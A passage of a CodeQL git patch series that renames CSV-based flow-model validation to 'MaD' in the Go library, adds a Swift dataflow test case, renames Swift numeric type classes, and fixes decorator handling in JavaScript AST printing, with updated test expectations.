- * subpackage of any other package with CSV framework coverage. + * subpackage of any other package with MaD framework coverage. */ private predicate canonicalPackageHasASubpackage(string package, string subpkg) { canonicalPackage(package) and @@ -160,9 +122,9 @@ private predicate canonicalPackageHasASubpackage(string package, string subpkg) } /** - * Holds if CSV framework coverage of `package` is `n` api endpoints of the + * Holds if MaD framework coverage of `package` is `n` api endpoints of the * kind `(kind, part)`, and `pkgs` is the number of subpackages of `package` - * which have CSV framework coverage (including `package` itself). + * which have MaD framework coverage (including `package` itself). */ predicate modelCoverage(string package, int pkgs, string kind, string part, int n) { pkgs = strictcount(string subpkg | canonicalPackageHasASubpackage(package, subpkg)) and @@ -193,8 +155,8 @@ predicate modelCoverage(string package, int pkgs, string kind, string part, int ) } -/** Provides a query predicate to check the CSV data for validation errors. */ -module CsvValidation { +/** Provides a query predicate to check the MaD models for validation errors. */ +module ModelValidation { private string getInvalidModelInput() { exists(string pred, AccessPath input, string part | sinkModel(_, _, _, _, _, _, input, _, _) and pred = "sink" @@ -227,57 +189,25 @@ module CsvValidation { } private string getInvalidModelKind() { - exists(string row, string kind | summaryModel(row) | - kind = row.splitAt(";", 8) and + exists(string kind | summaryModel(_, _, _, _, _, _, _, _, kind, _) | not kind = ["taint", "value"] and result = "Invalid kind \"" + kind + "\" in summary model." ) } - private string getInvalidModelSubtype() { - exists(string pred, string row | - sourceModel(row) and pred = "source" - or - sinkModel(row) and pred = "sink" - or - summaryModel(row) and pred = "summary" - | - exists(string b | - b = row.splitAt(";", 2) and - not b = ["true", "false"] and - result = "Invalid boolean \"" + b + "\" in " + pred + " model." - ) - ) - } - - private string getInvalidModelColumnCount() { - exists(string pred, string row, int expect | - sourceModel(row) and expect = 8 and pred = "source" - or - sinkModel(row) and expect = 8 and pred = "sink" - or - summaryModel(row) and expect = 9 and pred = "summary" - | - exists(int cols | - cols = 1 + max(int n | exists(row.splitAt(";", n))) and - cols != expect and - result = - "Wrong number of columns in " + pred + " model row, expected " + expect + ", got " + cols + - "." - ) - ) - } - private string getInvalidModelSignature() { - exists(string pred, string namespace, string type, string name, string signature, string ext | - sourceModel(namespace, type, _, name, signature, ext, _, _, _) and pred = "source" - or - sinkModel(namespace, type, _, name, signature, ext, _, _, _) and pred = "sink" - or - summaryModel(namespace, type, _, name, signature, ext, _, _, _, _) and pred = "summary" + exists( + string pred, string package, string type, string name, string signature, string ext, + string provenance | - not namespace.regexpMatch("[a-zA-Z0-9_\\./]*") and - result = "Dubious namespace \"" + namespace + "\" in " + pred + " model." + sourceModel(package, type, _, name, signature, ext, _, _, provenance) and pred = "source" + or + sinkModel(package, type, _, name, signature, ext, _, _, provenance) and pred = "sink" + or + summaryModel(package, type, _, name, signature, ext, _, _, _, provenance) and pred = "summary" + | + not package.regexpMatch("[a-zA-Z0-9_\\./]*") and + result = "Dubious package \"" + package + "\" in " + pred + " model." or not type.regexpMatch("[a-zA-Z0-9_\\$<>]*") and result = "Dubious type \"" + type + "\" in " + pred + " model." @@ -290,26 +220,29 @@ module CsvValidation { or not ext.regexpMatch("|Annotated") and result = "Unrecognized extra API graph element \"" + ext + "\" in " + pred + " model." + or + not provenance = ["manual", "generated"] and + result = "Unrecognized provenance description \"" + provenance + "\" in " + pred + " model." ) } - /** Holds if some row in a CSV-based flow model appears to contain typos. */ + /** Holds if some row in a MaD flow model appears to contain typos. */ query predicate invalidModelRow(string msg) { msg = [ getInvalidModelSignature(), getInvalidModelInput(), getInvalidModelOutput(), - getInvalidModelSubtype(), getInvalidModelColumnCount(), getInvalidModelKind() + getInvalidModelKind() ] } } pragma[nomagic] private predicate elementSpec( - string namespace, string type, boolean subtypes, string name, string signature, string ext + string package, string type, boolean subtypes, string name, string signature, string ext ) { - sourceModel(namespace, type, subtypes, name, signature, ext, _, _, _) or - sinkModel(namespace, type, subtypes, name, signature, ext, _, _, _) or - summaryModel(namespace, type, subtypes, name, signature, ext, _, _, _, _) + sourceModel(package, type, subtypes, name, signature, ext, _, _, _) or + sinkModel(package, type, subtypes, name, signature, ext, _, _, _) or + summaryModel(package, type, subtypes, name, signature, ext, _, _, _, _) } private string paramsStringPart(Function f, int i) { @@ -405,7 +338,7 @@ predicate parseContent(string component, DataFlow::Content content) { cached private module Cached { /** - * Holds if `node` is specified as a source with the given kind in a CSV flow + * Holds if `node` is specified as a source with the given kind in a MaD flow * model. */ cached @@ -414,7 +347,7 @@ private module Cached { } /** - * Holds if `node` is specified as a sink with the given kind in a CSV flow + * Holds if `node` is specified as a sink with the given kind in a MaD flow * model. */ cached diff --git a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImplSpecific.qll b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImplSpecific.qll index 5e3768d52f4..0bf368aee60 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImplSpecific.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/FlowSummaryImplSpecific.qll @@ -65,11 +65,9 @@ DataFlowType getSyntheticGlobalType(SummaryComponent::SyntheticGlobal sg) { any( predicate summaryElement( SummarizedCallableBase c, string input, string output, string kind, string provenance ) { - exists( - string namespace, string type, boolean subtypes, string name, string signature, string ext - | - summaryModel(namespace, type, subtypes, name, signature, ext, input, output, kind, provenance) and - c.asFunction() = interpretElement(namespace, type, subtypes, name, signature, ext).asEntity() + exists(string package, string type, boolean subtypes, string name, string signature, string ext | + summaryModel(package, type, subtypes, name, signature, ext, input, output, kind, provenance) and + c.asFunction() = interpretElement(package, type, subtypes, name, signature, ext).asEntity() ) } @@ -154,11 +152,9 @@ class SourceOrSinkElement extends TSourceOrSinkElement { * `output`, kind `kind`, and provenance `provenance`. */ predicate sourceElement(SourceOrSinkElement e, string output, string kind, string provenance) { - exists( - string namespace, string type, boolean subtypes, string name, string signature, string ext - | - sourceModel(namespace, type, subtypes, name, signature, ext, output, kind, provenance) and - e = interpretElement(namespace, type, subtypes, name, signature, ext) + exists(string package, string type, boolean subtypes, string name, string signature, string ext | + sourceModel(package, type, subtypes, name, signature, ext, output, kind, provenance) and + e = interpretElement(package, type, subtypes, name, signature, ext) ) } @@ -167,11 +163,9 @@ predicate sourceElement(SourceOrSinkElement e, string output, string kind, strin * `input`, kind `kind` and provenance `provenance`. */ predicate sinkElement(SourceOrSinkElement e, string input, string kind, string provenance) { - exists( - string namespace, string type, boolean subtypes, string name, string signature, string ext - | - sinkModel(namespace, type, subtypes, name, signature, ext, input, kind, provenance) and - e = interpretElement(namespace, type, subtypes, name, signature, ext) + exists(string package, string type, boolean subtypes, string name, string signature, string ext | + sinkModel(package, type, subtypes, name, signature, ext, input, kind, provenance) and + e = interpretElement(package, type, subtypes, name, signature, ext) ) } diff --git a/go/ql/lib/semmle/go/security/FlowSources.qll b/go/ql/lib/semmle/go/security/FlowSources.qll index de8fb5c3732..b4d4c4d3187 100644 --- a/go/ql/lib/semmle/go/security/FlowSources.qll +++ b/go/ql/lib/semmle/go/security/FlowSources.qll @@ -23,7 +23,12 @@ module UntrustedFlowSource { */ abstract class Range extends DataFlow::Node { } - class CsvRemoteSource extends Range { - CsvRemoteSource() { ExternalFlow::sourceNode(this, "remote") } + /** + * A source of data that is controlled by an untrusted user. + */ + class MaDRemoteSource extends Range { + MaDRemoteSource() { ExternalFlow::sourceNode(this, "remote") } } + + deprecated class CsvRemoteSource = MaDRemoteSource; } diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ql index 45e67564e06..9719a9d69a6 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/completetest.ql @@ -4,7 +4,7 @@ import go import semmle.go.dataflow.ExternalFlow -import CsvValidation +import ModelValidation import semmle.go.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl import TestUtilities.InlineFlowTest diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ql index 48d75ce06e6..de84cf24e4d 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/sinks.ql @@ -1,6 +1,6 @@ import go import semmle.go.dataflow.ExternalFlow -import CsvValidation +import ModelValidation from DataFlow::Node node, string kind where sinkNode(node, kind) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ql index cffb909c495..d1cd0fee89d 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/srcs.ql @@ -1,6 +1,6 @@ import go import semmle.go.dataflow.ExternalFlow -import CsvValidation +import ModelValidation from DataFlow::Node node, string kind where sourceNode(node, kind) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ql index 8ae82d104d6..00067971b76 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlow/steps.ql @@ -1,6 +1,6 @@ import go import semmle.go.dataflow.ExternalFlow -import CsvValidation +import ModelValidation import semmle.go.dataflow.internal.FlowSummaryImpl as FlowSummaryImpl from DataFlow::Node node1, DataFlow::Node node2 diff --git a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ql b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ql index f7c77d944f2..1be00de1f13 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/ExternalFlowVarArgs/Flows.ql @@ -1,6 +1,6 @@ import go import semmle.go.dataflow.ExternalFlow -import CsvValidation +import ModelValidation import TestUtilities.InlineExpectationsTest class DataConfiguration extends DataFlow::Configuration { diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql index e80681e243e..176396da6f7 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql @@ -1,6 +1,6 @@ import go import semmle.go.dataflow.ExternalFlow -import CsvValidation +import ModelValidation // import DataFlow::PartialPathGraph import TestUtilities.InlineExpectationsTest From 4e5483744f9124584dce02b346f847477c83a604 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 12 Jan 2023 10:50:28 +0000 Subject: [PATCH 209/381] Swift: Add a test case we're discussing. --- .../dataflow/dataflow/DataFlow.expected | 17 +++++++--- .../dataflow/dataflow/FlowConfig.qll | 2 +- .../dataflow/dataflow/LocalFlow.expected | 34 +++++++++++-------- .../dataflow/dataflow/test.swift | 7 ++++ 4 files changed, 39 insertions(+), 21 deletions(-) diff --git a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected index d95be652a64..c1a30e3b551 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/DataFlow.expected @@ -100,7 +100,7 @@ edges | test.swift:225:14:225:21 | call to source() : | test.swift:235:13:235:15 | .source_value | | test.swift:225:14:225:21 | call to source() : | test.swift:238:13:238:15 | .source_value | | test.swift:259:12:259:19 | call to source() : | test.swift:263:13:263:28 | call to optionalSource() : | -| test.swift:259:12:259:19 | call to source() : | test.swift:437:13:437:28 | call to optionalSource() : | +| test.swift:259:12:259:19 | call to source() : | test.swift:439:13:439:28 | call to optionalSource() : | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:265:15:265:15 | x | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:267:15:267:16 | ...! | | test.swift:263:13:263:28 | call to optionalSource() : | test.swift:271:15:271:16 | ...? : | @@ -141,7 +141,9 @@ edges | test.swift:357:15:357:15 | t1 [Tuple element at index 1] : | test.swift:357:15:357:18 | .1 | | test.swift:360:15:360:15 | t2 [Tuple element at index 0] : | test.swift:360:15:360:18 | .0 | | test.swift:361:15:361:15 | t2 [Tuple element at index 1] : | test.swift:361:15:361:18 | .1 | -| test.swift:437:13:437:28 | call to optionalSource() : | test.swift:440:19:440:19 | a | +| test.swift:439:13:439:28 | call to optionalSource() : | test.swift:442:19:442:19 | a | +| test.swift:455:21:455:29 | call to source2() : | test.swift:456:19:456:19 | x | +| test.swift:455:21:455:29 | call to source2() : | test.swift:457:19:457:19 | y | nodes | file://:0:0:0:0 | .a [x] : | semmle.label | .a [x] : | | file://:0:0:0:0 | .x : | semmle.label | .x : | @@ -298,8 +300,11 @@ nodes | test.swift:360:15:360:18 | .0 | semmle.label | .0 | | test.swift:361:15:361:15 | t2 [Tuple element at index 1] : | semmle.label | t2 [Tuple element at index 1] : | | test.swift:361:15:361:18 | .1 | semmle.label | .1 | -| test.swift:437:13:437:28 | call to optionalSource() : | semmle.label | call to optionalSource() : | -| test.swift:440:19:440:19 | a | semmle.label | a | +| test.swift:439:13:439:28 | call to optionalSource() : | semmle.label | call to optionalSource() : | +| test.swift:442:19:442:19 | a | semmle.label | a | +| test.swift:455:21:455:29 | call to source2() : | semmle.label | call to source2() : | +| test.swift:456:19:456:19 | x | semmle.label | x | +| test.swift:457:19:457:19 | y | semmle.label | y | subpaths | test.swift:75:21:75:22 | &... : | test.swift:65:16:65:28 | arg1 : | test.swift:65:1:70:1 | arg2[return] : | test.swift:75:31:75:32 | [post] &... : | | test.swift:114:19:114:19 | arg : | test.swift:109:9:109:14 | arg : | test.swift:110:12:110:12 | arg : | test.swift:114:12:114:22 | call to ... : | @@ -380,4 +385,6 @@ subpaths | test.swift:357:15:357:18 | .1 | test.swift:351:31:351:38 | call to source() : | test.swift:357:15:357:18 | .1 | result | | test.swift:360:15:360:18 | .0 | test.swift:351:18:351:25 | call to source() : | test.swift:360:15:360:18 | .0 | result | | test.swift:361:15:361:18 | .1 | test.swift:351:31:351:38 | call to source() : | test.swift:361:15:361:18 | .1 | result | -| test.swift:440:19:440:19 | a | test.swift:259:12:259:19 | call to source() : | test.swift:440:19:440:19 | a | result | +| test.swift:442:19:442:19 | a | test.swift:259:12:259:19 | call to source() : | test.swift:442:19:442:19 | a | result | +| test.swift:456:19:456:19 | x | test.swift:455:21:455:29 | call to source2() : | test.swift:456:19:456:19 | x | result | +| test.swift:457:19:457:19 | y | test.swift:455:21:455:29 | call to source2() : | test.swift:457:19:457:19 | y | result | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/FlowConfig.qll b/swift/ql/test/library-tests/dataflow/dataflow/FlowConfig.qll index 1be01c4a6c8..062814ddfd2 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/FlowConfig.qll +++ b/swift/ql/test/library-tests/dataflow/dataflow/FlowConfig.qll @@ -10,7 +10,7 @@ class TestConfiguration extends DataFlow::Configuration { TestConfiguration() { this = "TestConfiguration" } override predicate isSource(DataFlow::Node src) { - src.asExpr().(CallExpr).getStaticTarget().getName() = "source()" + src.asExpr().(CallExpr).getStaticTarget().getName().matches("source%()") } override predicate isSink(DataFlow::Node sink) { diff --git a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected index 88f69288dfb..da400552ce2 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected +++ b/swift/ql/test/library-tests/dataflow/dataflow/LocalFlow.expected @@ -355,18 +355,22 @@ | test.swift:430:13:430:33 | SSA def(y) | test.swift:432:19:432:19 | y | | test.swift:430:37:430:37 | a | test.swift:430:13:430:33 | SSA def(x) | | test.swift:430:37:430:37 | a | test.swift:430:13:430:33 | SSA def(y) | -| test.swift:436:21:436:27 | SSA def(y) | test.swift:439:27:439:27 | y | -| test.swift:436:21:436:27 | SSA def(y) | test.swift:444:22:444:22 | y | -| test.swift:436:21:436:27 | y | test.swift:436:21:436:27 | SSA def(y) | -| test.swift:437:9:437:9 | SSA def(x) | test.swift:439:16:439:16 | x | -| test.swift:437:13:437:28 | call to optionalSource() | test.swift:437:9:437:9 | SSA def(x) | -| test.swift:439:8:439:12 | SSA def(a) | test.swift:440:19:440:19 | a | -| test.swift:439:16:439:16 | x | test.swift:439:8:439:12 | SSA def(a) | -| test.swift:439:16:439:16 | x | test.swift:444:19:444:19 | x | -| test.swift:439:19:439:23 | SSA def(b) | test.swift:441:19:441:19 | b | -| test.swift:439:27:439:27 | y | test.swift:439:19:439:23 | SSA def(b) | -| test.swift:439:27:439:27 | y | test.swift:444:22:444:22 | y | -| test.swift:444:9:444:9 | SSA def(tuple1) | test.swift:445:12:445:12 | tuple1 | -| test.swift:444:18:444:23 | (...) | test.swift:444:9:444:9 | SSA def(tuple1) | -| test.swift:446:10:446:37 | SSA def(a) | test.swift:447:19:447:19 | a | -| test.swift:446:10:446:37 | SSA def(b) | test.swift:448:19:448:19 | b | +| test.swift:438:21:438:27 | SSA def(y) | test.swift:441:27:441:27 | y | +| test.swift:438:21:438:27 | SSA def(y) | test.swift:446:22:446:22 | y | +| test.swift:438:21:438:27 | y | test.swift:438:21:438:27 | SSA def(y) | +| test.swift:439:9:439:9 | SSA def(x) | test.swift:441:16:441:16 | x | +| test.swift:439:13:439:28 | call to optionalSource() | test.swift:439:9:439:9 | SSA def(x) | +| test.swift:441:8:441:12 | SSA def(a) | test.swift:442:19:442:19 | a | +| test.swift:441:16:441:16 | x | test.swift:441:8:441:12 | SSA def(a) | +| test.swift:441:16:441:16 | x | test.swift:446:19:446:19 | x | +| test.swift:441:19:441:23 | SSA def(b) | test.swift:443:19:443:19 | b | +| test.swift:441:27:441:27 | y | test.swift:441:19:441:23 | SSA def(b) | +| test.swift:441:27:441:27 | y | test.swift:446:22:446:22 | y | +| test.swift:446:9:446:9 | SSA def(tuple1) | test.swift:447:12:447:12 | tuple1 | +| test.swift:446:18:446:23 | (...) | test.swift:446:9:446:9 | SSA def(tuple1) | +| test.swift:448:10:448:37 | SSA def(a) | test.swift:449:19:449:19 | a | +| test.swift:448:10:448:37 | SSA def(b) | test.swift:450:19:450:19 | b | +| test.swift:455:8:455:17 | SSA def(x) | test.swift:456:19:456:19 | x | +| test.swift:455:8:455:17 | SSA def(y) | test.swift:457:19:457:19 | y | +| test.swift:455:21:455:29 | call to source2() | test.swift:455:8:455:17 | SSA def(x) | +| test.swift:455:21:455:29 | call to source2() | test.swift:455:8:455:17 | SSA def(y) | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test.swift b/swift/ql/test/library-tests/dataflow/dataflow/test.swift index 7692dc05e68..400b3c05bf6 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test.swift @@ -433,6 +433,8 @@ func testEnums() { } } +func source2() -> (Int, Int)? { return nil } + func testOptionals2(y: Int?) { let x = optionalSource() @@ -449,4 +451,9 @@ func testOptionals2(y: Int?) { default: () } + + if let (x, y) = source2() { + sink(arg: x) // $ flow=455 + sink(arg: y) // $ flow=455 + } } From d0eb167d47b9b9ed6a21471ee3655434824f8523 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 12 Jan 2023 11:28:44 +0000 Subject: [PATCH 210/381] Swift: Merge FloatingPointType.qll into NumericOrCharType.qll, because it is a numeric type and other stuff like CharacterType is there. --- .../codeql/swift/elements/type/FloatingPointType.qll | 12 ------------ .../codeql/swift/elements/type/NumericOrCharType.qll | 11 +++++++++++ swift/ql/lib/swift.qll | 1 - 3 files changed, 11 insertions(+), 13 deletions(-) delete mode 100644 swift/ql/lib/codeql/swift/elements/type/FloatingPointType.qll diff --git a/swift/ql/lib/codeql/swift/elements/type/FloatingPointType.qll b/swift/ql/lib/codeql/swift/elements/type/FloatingPointType.qll deleted file mode 100644 index e5ae0ac3e7a..00000000000 --- a/swift/ql/lib/codeql/swift/elements/type/FloatingPointType.qll +++ /dev/null @@ -1,12 +0,0 @@ -private import swift - -/** - * A floating-point type. This includes the `Float` type, the `Double`, and - * builtin floating-point types. - */ -class FloatingPointType extends Type { - FloatingPointType() { - this.getName() = ["Float", "Double"] or - this instanceof BuiltinFloatType - } -} diff --git a/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll b/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll index 217690039ed..31a825bd6cd 100644 --- a/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll +++ b/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll @@ -1,5 +1,16 @@ private import swift +/** + * A floating-point type. This includes the `Float` type, the `Double`, and + * builtin floating-point types. + */ +class FloatingPointType extends Type { + FloatingPointType() { + this.getName() = ["Float", "Double"] or + this instanceof BuiltinFloatType + } +} + /** The `Character` type. */ class CharacterType extends StructType { CharacterType() { this.getName() = "Character" } diff --git a/swift/ql/lib/swift.qll b/swift/ql/lib/swift.qll index 552f2c99828..4d79e4b73eb 100644 --- a/swift/ql/lib/swift.qll +++ b/swift/ql/lib/swift.qll @@ -10,6 +10,5 @@ import codeql.swift.elements.expr.InitializerCallExpr import codeql.swift.elements.expr.SelfRefExpr import codeql.swift.elements.decl.MethodDecl import codeql.swift.elements.decl.ClassOrStructDecl -import codeql.swift.elements.type.FloatingPointType import codeql.swift.elements.type.NumericOrCharType import codeql.swift.Unit From 418d593a97d5666933146477b9e715f22c177e0c Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 12 Jan 2023 11:39:33 +0000 Subject: [PATCH 211/381] Swift: Replace NumericOrCharType with a more basic NumericType, and rename classes for consistency with other static languages. --- .../swift/elements/type/NumericOrCharType.qll | 20 +++++++++---------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll b/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll index 31a825bd6cd..1becac4493b 100644 --- a/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll +++ b/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll @@ -19,8 +19,8 @@ class CharacterType extends StructType { /** * An integer-like type. For example, `Int`, `Int16`, `Uint16`, etc. */ -class IntegerType extends Type { - IntegerType() { +class IntegralType extends Type { + IntegralType() { this.getName() = ["Int", "Int8", "Int16", "Int32", "Int64", "UInt", "UInt8", "UInt16", "UInt32", "UInt64"] or @@ -29,18 +29,16 @@ class IntegerType extends Type { } /** The `Bool` type. */ -class BooleanType extends Type { - BooleanType() { this.getName() = "Bool" } +class BoolType extends Type { + BoolType() { this.getName() = "Bool" } } /** - * A numeric-like type. This includes the types `Character`, `Bool`, and all - * the integer-like types. + * A numeric type. This includes the integer and floating point types. */ -class NumericOrCharType extends Type { - NumericOrCharType() { - this instanceof CharacterType or - this instanceof IntegerType or - this instanceof BooleanType +class NumericType extends Type { + NumericType() { + this instanceof IntegralType or + this instanceof FloatingPointType } } From 3d1b2fdbda06c77dafcb4e056908547e28f588f6 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 12 Jan 2023 11:46:51 +0000 Subject: [PATCH 212/381] Swift: Rename NumericOrCharType.qll -> Numer> NumericType.qll. --- .../elements/type/{NumericOrCharType.qll => NumericType.qll} | 0 swift/ql/lib/swift.qll | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) rename swift/ql/lib/codeql/swift/elements/type/{NumericOrCharType.qll => NumericType.qll} (100%) diff --git a/swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll b/swift/ql/lib/codeql/swift/elements/type/NumericType.qll similarity index 100% rename from swift/ql/lib/codeql/swift/elements/type/NumericOrCharType.qll rename to swift/ql/lib/codeql/swift/elements/type/NumericType.qll diff --git a/swift/ql/lib/swift.qll b/swift/ql/lib/swift.qll index 4d79e4b73eb..897bbf9b2f7 100644 --- a/swift/ql/lib/swift.qll +++ b/swift/ql/lib/swift.qll @@ -10,5 +10,5 @@ import codeql.swift.elements.expr.InitializerCallExpr import codeql.swift.elements.expr.SelfRefExpr import codeql.swift.elements.decl.MethodDecl import codeql.swift.elements.decl.ClassOrStructDecl -import codeql.swift.elements.type.NumericOrCharType +import codeql.swift.elements.type.NumericType import codeql.swift.Unit From 7ae27bcc34af2c263eaf43c5f26f623b6af52059 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Thu, 12 Jan 2023 15:37:52 +0100 Subject: [PATCH 213/381] fix errors in JS printAst --- .../ql/lib/semmle/javascript/PrintAst.qll | 13 +- .../AST/Decorators/printAst.expected | 138 ++++++++++++++++++ .../library-tests/AST/Decorators/printAst.ql | 2 + .../AST/Decorators/tsconfig.json | 7 + .../test/library-tests/AST/Decorators/tst.ts | 14 ++ .../TypeAnnotations/printAst.expected | 112 +++++++------- .../TypeScript/Types/printAst.expected | 128 ++++++++-------- 7 files changed, 291 insertions(+), 123 deletions(-) create mode 100644 javascript/ql/test/library-tests/AST/Decorators/printAst.expected create mode 100644 javascript/ql/test/library-tests/AST/Decorators/printAst.ql create mode 100644 javascript/ql/test/library-tests/AST/Decorators/tsconfig.json create mode 100644 javascript/ql/test/library-tests/AST/Decorators/tst.ts diff --git a/javascript/ql/lib/semmle/javascript/PrintAst.qll b/javascript/ql/lib/semmle/javascript/PrintAst.qll index a4d71362818..6339d81a01c 100644 --- a/javascript/ql/lib/semmle/javascript/PrintAst.qll +++ b/javascript/ql/lib/semmle/javascript/PrintAst.qll @@ -30,12 +30,17 @@ private predicate shouldPrint(Locatable e, Location l) { exists(PrintAstConfiguration config | config.shouldPrint(e, l)) } -/** Holds if the given element does not need to be rendered in the AST, due to being the `TopLevel` for a file. */ +/** + * Holds if the given element does not need to be rendered in the AST. + * Either due to being the `TopLevel` for a file, or an internal node representing a decorator list. + */ private predicate isNotNeeded(Locatable el) { el instanceof TopLevel and el.getLocation().getStartLine() = 0 and el.getLocation().getStartColumn() = 0 or + el instanceof @decorator_list // there is no public API for this. + or // relaxing aggressive type inference. none() } @@ -500,9 +505,11 @@ private module PrintJavaScript { override Parameter element; override AstNode getChildNode(int childIndex) { - childIndex = 0 and result = element.getTypeAnnotation() + result = super.getChildNode(childIndex) // in case the parameter is a destructuring pattern or - childIndex = 1 and result = element.getDefault() + childIndex = -2 and result = element.getTypeAnnotation() + or + childIndex = -1 and result = element.getDefault() } } diff --git a/javascript/ql/test/library-tests/AST/Decorators/printAst.expected b/javascript/ql/test/library-tests/AST/Decorators/printAst.expected new file mode 100644 index 00000000000..5cbec5ec883 --- /dev/null +++ b/javascript/ql/test/library-tests/AST/Decorators/printAst.expected @@ -0,0 +1,138 @@ +nodes +| file://:0:0:0:0 | (Arguments) | semmle.label | (Arguments) | +| file://:0:0:0:0 | (Parameters) | semmle.label | (Parameters) | +| tst.ts:1:1:1:22 | [DeclStmt] const Dec = ... | semmle.label | [DeclStmt] const Dec = ... | +| tst.ts:1:1:1:22 | [DeclStmt] const Dec = ... | semmle.order | 1 | +| tst.ts:1:7:1:9 | [VarDecl] Dec | semmle.label | [VarDecl] Dec | +| tst.ts:1:7:1:21 | [VariableDeclarator] Dec: any = null | semmle.label | [VariableDeclarator] Dec: any = null | +| tst.ts:1:12:1:14 | [KeywordTypeExpr] any | semmle.label | [KeywordTypeExpr] any | +| tst.ts:1:18:1:21 | [Literal] null | semmle.label | [Literal] null | +| tst.ts:3:1:3:6 | [Decorator] @Dec() | semmle.label | [Decorator] @Dec() | +| tst.ts:3:2:3:4 | [VarRef] Dec | semmle.label | [VarRef] Dec | +| tst.ts:3:2:3:6 | [CallExpr] Dec() | semmle.label | [CallExpr] Dec() | +| tst.ts:4:1:8:1 | [ExportDeclaration] export ... id {} } | semmle.label | [ExportDeclaration] export ... id {} } | +| tst.ts:4:1:8:1 | [ExportDeclaration] export ... id {} } | semmle.order | 2 | +| tst.ts:4:8:8:1 | [ClassDefinition,TypeDefinition] class O ... id {} } | semmle.label | [ClassDefinition,TypeDefinition] class O ... id {} } | +| tst.ts:4:14:4:30 | [VarDecl] OperatorResolvers | semmle.label | [VarDecl] OperatorResolvers | +| tst.ts:4:32:4:31 | [BlockStmt] {} | semmle.label | [BlockStmt] {} | +| tst.ts:4:32:4:31 | [ClassInitializedMember,ConstructorDefinition] constructor() {} | semmle.label | [ClassInitializedMember,ConstructorDefinition] constructor() {} | +| tst.ts:4:32:4:31 | [FunctionExpr] () {} | semmle.label | [FunctionExpr] () {} | +| tst.ts:4:32:4:31 | [Label] constructor | semmle.label | [Label] constructor | +| tst.ts:5:3:5:8 | [Decorator] @Dec() | semmle.label | [Decorator] @Dec() | +| tst.ts:5:4:5:6 | [VarRef] Dec | semmle.label | [VarRef] Dec | +| tst.ts:5:4:5:8 | [CallExpr] Dec() | semmle.label | [CallExpr] Dec() | +| tst.ts:6:3:6:8 | [Decorator] @Dec() | semmle.label | [Decorator] @Dec() | +| tst.ts:6:4:6:6 | [VarRef] Dec | semmle.label | [VarRef] Dec | +| tst.ts:6:4:6:8 | [CallExpr] Dec() | semmle.label | [CallExpr] Dec() | +| tst.ts:7:3:7:11 | [Label] operators | semmle.label | [Label] operators | +| tst.ts:7:3:7:22 | 